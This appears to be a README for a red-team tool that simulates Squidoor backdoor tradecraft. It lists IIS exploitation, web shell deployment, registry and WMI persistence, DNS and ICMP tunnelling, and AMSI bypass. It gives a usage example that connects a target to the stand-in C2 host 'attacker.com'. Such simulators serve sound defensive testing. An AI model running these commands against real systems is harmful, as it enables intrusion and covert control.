A comprehensive Bash script that simulates advanced adversary behaviors inspired by the Squidoor backdoor, as documented by Unit 42. This tool is designed for penetration testing, red teaming, and validating cyber defense mechanisms.
-
Initial Access
- IIS vulnerability exploitation
- Web shell deployment (ASPX)
- Multiple persistence mechanisms
-
Command and Control
- Outlook API communication
- DNS tunneling
- ICMP tunneling
- Encrypted communication channels
-
Persistence Mechanisms
- Registry modifications
- Scheduled tasks
- WMI event subscriptions
-
Evasion Techniques
- AMSI bypass
- Payload obfuscation
- Encrypted communication
- Bash 5.0 or higher
- Root privileges (recommended)
- Required tools:
- dnscat2
- icmpsh
- impacket
- metasploit-framework
- yq
- Clone the repository:
git clone https://github.com/yourusername/squidoor-simulator.git
cd squidoor-simulator
- Make the script executable:
chmod +x squidoor_simulator.sh
- Install dependencies:
# The script will automatically check and prompt to install missing dependencies
./squidoor_simulator.sh -h
Basic usage:
./squidoor_simulator.sh -t <target> -c <c2-server> -p <protocol>
Options:
-t, --target
: Target IP address or hostname-c, --c2-server
: Command and Control server address-p, --protocol
: C2 protocol (outlook|dns|icmp)-h, --help
: Show help message
Example:
./squidoor_simulator.sh -t 192.168.1.100 -c attacker.com -p outlook
The script uses a YAML configuration file (config.yaml
) for detailed settings. A default configuration will be created if none exists.
Configuration options include:
- Target settings
- C2 server details
- Web shell configuration
- Persistence mechanisms
- Evasion techniques
The script generates:
- Detailed logs in
squidoor.log
- Simulation report in
squidoor_report_[timestamp].txt
- Temporary files in
/tmp/squidoor/
This tool is for educational and testing purposes only. Use only on systems you own or have explicit permission to test. Unauthorized use may be illegal.
MIT License - See LICENSE file for details
- Unit 42 for their analysis of the Squidoor backdoor
- The security research community for their contributions to understanding advanced adversary behaviors